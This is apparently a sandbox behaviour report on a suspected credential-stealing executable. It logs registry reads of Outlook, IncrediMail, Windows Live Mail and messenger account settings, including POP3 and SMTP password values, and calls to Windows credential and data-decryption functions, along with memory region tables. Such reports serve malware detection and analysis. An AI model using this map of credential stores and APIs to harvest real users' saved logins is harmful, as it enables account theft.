| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7df1ae4ad074c146bb02f647b97dd78e | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\fcc54e287a017c4094152f1c67fbc03d | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\IncrediMail\Identities | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Group Mail | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\MessengerService | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Yahoo\Pager | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Identities\{74A13782-B361-4204-9DAA-0A3D49DA4337} | value_name = Username, data = Main Identity, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = POP3 User, data = 112, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = IMAP User, data = 112, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = HTTP User, data = 112, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 | value_name = SMTP User, data = 112, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 User, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Server, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = Display Name, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = Email, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Server, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP Port, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Port, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Use SPA, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = POP3 Password, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = IMAP User, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = HTTP User, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 | value_name = SMTP User, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = POP3 User, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = IMAP User, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = HTTP User, data = 103, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 | value_name = SMTP User, data = 103, type = REG_NONE |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Identities | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0413e2ad850e7146953cbb4c2672287e | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\0a0d020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1b5aad0cdb629e49a2c6203d4a6a948a | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\1dab3177c2ac33448a4fe54b862a329e | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\2a7b899b94a04042a46a1cd96dc2a18c | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\3517490d76624c419a828607e2a54604 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7a302ee0804dab4ba930ea4351b9b4ac | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\7df1ae4ad074c146bb02f647b97dd78e | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\8503020000000000c000000000000046 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001 | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\fcc54e287a017c4094152f1c67fbc03d | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | - |
|
1 | |
| Enumerate Keys | HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles | - |
|
1 |
Module (32)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | comctl32.dll | base_address = 0x66b50000 |
|
1 | |
| Load | shell32.dll | base_address = 0x760f0000 |
|
1 | |
| Load | pstorec.dll | base_address = 0x66b10000 |
|
1 | |
| Load | crypt32.dll | base_address = 0x75a90000 |
|
2 | |
| Load | advapi32.dll | base_address = 0x75c90000 |
|
3 | |
| Get Handle | c:\users\bgc6u8~1\appdata\local\temp\727.exe | base_address = 0x400000 |
|
2 | |
| Get Filename | - | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll | function = InitCommonControlsEx, address_out = 0x66b56be6 |
|
1 | |
| Get Address | c:\windows\system32\shell32.dll | function = SHGetSpecialFolderPathA, address_out = 0x7633fb26 |
|
1 | |
| Get Address | c:\windows\system32\pstorec.dll | function = PStoreCreateInstance, address_out = 0x66b1526c |
|
1 | |
| Get Address | c:\windows\system32\crypt32.dll | function = CryptUnprotectData, address_out = 0x75ac5a7f |
|
2 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredReadA, address_out = 0x75cd71c1 |
|
3 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredFree, address_out = 0x75c9b2ec |
|
3 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredDeleteA, address_out = 0x75cd7941 |
|
3 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredEnumerateA, address_out = 0x75cd7381 |
|
3 | |
| Get Address | c:\windows\system32\advapi32.dll | function = CredEnumerateW, address_out = 0x75cd7481 |
|
3 |
System (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Computer Name | result_out = F71GWAT |
|
1 | |
| Get Info | type = Operating System |
|
1 |
Ini (7)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = ShowGridLines, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = SaveFilterIndex, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = AddExportHeaderLine, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = MarkOddEvenRows, default_value = 0 |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = WinPos |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = Columns |
|
1 | |
| Read | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.cfg | section_name = General, key_name = Sort, default_value = 0 |
|
1 |
Process #10: aeroroyale.exe
50
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" "C:\Users\BGC6U8~1\AppData\Local\Temp\F843.tmp" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:03:27, Reason: Child Process |
| Unmonitor | End Time: 00:03:34, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xd48 |
| Parent PID | 0xc08 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
D4C
0x
D6C
0x
D70
0x
D74
0x
D78
0x
D7C
0x
D80
0x
D84
0x
D88
0x
D8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00140000 | 0x001a6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x00277fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000290000 | 0x00290000 | 0x00291fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x0039ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003b0000 | 0x003b0000 | 0x003b0fff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x003c0000 | 0x003c0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003c1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e9fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | - |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x0114ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001150000 | 0x01150000 | 0x0120ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x01150000 | 0x011abfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001150000 | 0x01150000 | 0x011bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001150000 | 0x01150000 | 0x01152fff | Pagefile Backed Memory | rw |
|
|
|
- |
| tzres.dll | 0x01150000 | 0x01150fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001150000 | 0x01150000 | 0x01150fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001160000 | 0x01160000 | 0x01161fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001160000 | 0x01160000 | 0x01166fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001170000 | 0x01170000 | 0x01170fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001170000 | 0x01170000 | 0x01171fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001180000 | 0x01180000 | 0x011bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011c0000 | 0x011c0000 | 0x011c0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000011d0000 | 0x011d0000 | 0x011d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000011e0000 | 0x011e0000 | 0x011e0fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000011f0000 | 0x011f0000 | 0x011f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0120ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01210000 | 0x014defff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000014e0000 | 0x014e0000 | 0x016bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000014e0000 | 0x014e0000 | 0x015befff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000015c0000 | 0x015c0000 | 0x0163ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001640000 | 0x01640000 | 0x01643fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001650000 | 0x01650000 | 0x01650fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001660000 | 0x01660000 | 0x01660fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001680000 | 0x01680000 | 0x016bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016c0000 | 0x016c0000 | 0x0189ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000016c0000 | 0x016c0000 | 0x017bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001800000 | 0x01800000 | 0x0189ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000018a0000 | 0x018a0000 | 0x0209ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000000018a0000 | 0x018a0000 | 0x01c92fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000020a0000 | 0x020a0000 | 0x0219ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000021a0000 | 0x021a0000 | 0x0229ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022a0000 | 0x022a0000 | 0x0239ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000023a0000 | 0x023a0000 | 0x02b9ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002ba0000 | 0x02ba0000 | 0x02ca0fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ba0000 | 0x02ba0000 | 0x02c9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ca0000 | 0x02ca0000 | 0x02d9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002da0000 | 0x02da0000 | 0x02e9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ea0000 | 0x02ea0000 | 0x0307ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002ea0000 | 0x02ea0000 | 0x02f9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003070000 | 0x03070000 | 0x0307ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003080000 | 0x03080000 | 0x031fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003080000 | 0x03080000 | 0x0317ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000031f0000 | 0x031f0000 | 0x031fffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000003200000 | 0x03200000 | 0x039fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004d00000 | 0x04d00000 | 0x04dfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000037170000 | 0x37170000 | 0x3717ffff | Private Memory | rwx |
|
|
|
- |
| mspst32.dll | 0x632e0000 | 0x63477fff | Memory Mapped File | rwx |
|
|
|
- |
| olmapi32.dll | 0x63480000 | 0x6384efff | Memory Mapped File | rwx |
|
|
|
- |
| mapir.dll | 0x64fa0000 | 0x650d3fff | Memory Mapped File | rwx |
|
|
|
- |
| riched20.dll | 0x65290000 | 0x6541dfff | Memory Mapped File | rwx |
|
|
|
- |
| adal.dll | 0x66500000 | 0x665b4fff | Memory Mapped File | rwx |
|
|
|
- |
| msadox.dll | 0x66700000 | 0x6675afff | Memory Mapped File | rwx |
|
|
|
- |
| msadox.dll | 0x66900000 | 0x6695afff | Memory Mapped File | rwx |
|
|
|
- |
| contab32.dll | 0x66a70000 | 0x66a92fff | Memory Mapped File | rwx |
|
|
|
- |
| davclnt.dll | 0x66b30000 | 0x66b46fff | Memory Mapped File | rwx |
|
|
|
- |
| msores.dll | 0x67300000 | 0x6bfeafff | Memory Mapped File | rwx |
|
|
|
- |
| mso.dll | 0x6bff0000 | 0x6d8d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msointl.dll | 0x6ea60000 | 0x6edd0fff | Memory Mapped File | rwx |
|
|
|
- |
| webio.dll | 0x6fd30000 | 0x6fd7efff | Memory Mapped File | rwx |
|
|
|
- |
| winhttp.dll | 0x6fd80000 | 0x6fdd7fff | Memory Mapped File | rwx |
|
|
|
- |
| davhlpr.dll | 0x70250000 | 0x70257fff | Memory Mapped File | rwx |
|
|
|
- |
| osppc.dll | 0x70ac0000 | 0x70aecfff | Memory Mapped File | rwx |
|
|
|
- |
| d2d1.dll | 0x70b80000 | 0x70c39fff | Memory Mapped File | rwx |
|
|
|
- |
| office.odf | 0x716e0000 | 0x71bdffff | Memory Mapped File | rwx |
|
|
|
- |
| msi.dll | 0x71be0000 | 0x71e1ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp100.dll | 0x71e50000 | 0x71eb8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr100.dll | 0x71ec0000 | 0x71f7efff | Memory Mapped File | rwx |
|
|
|
- |
| msimg32.dll | 0x729a0000 | 0x729a4fff | Memory Mapped File | rwx |
|
|
|
- |
| oleacc.dll | 0x72fc0000 | 0x72ffbfff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74030000 | 0x74054fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| wtsapi32.dll | 0x74370000 | 0x7437cfff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x744c0000 | 0x744d2fff | Memory Mapped File | rwx |
|
|
|
- |
| gdiplus.dll | 0x74660000 | 0x747effff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74ee0000 | 0x74ee8fff | Memory Mapped File | rwx |
|
|
|
- |
| secur32.dll | 0x758a0000 | 0x758a7fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x758c0000 | 0x758dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| winsta.dll | 0x75950000 | 0x75978fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75990000 | 0x7599afff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75e90000 | 0x75fc5fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76dc0000 | 0x76f5cfff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x76f70000 | 0x7716afff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
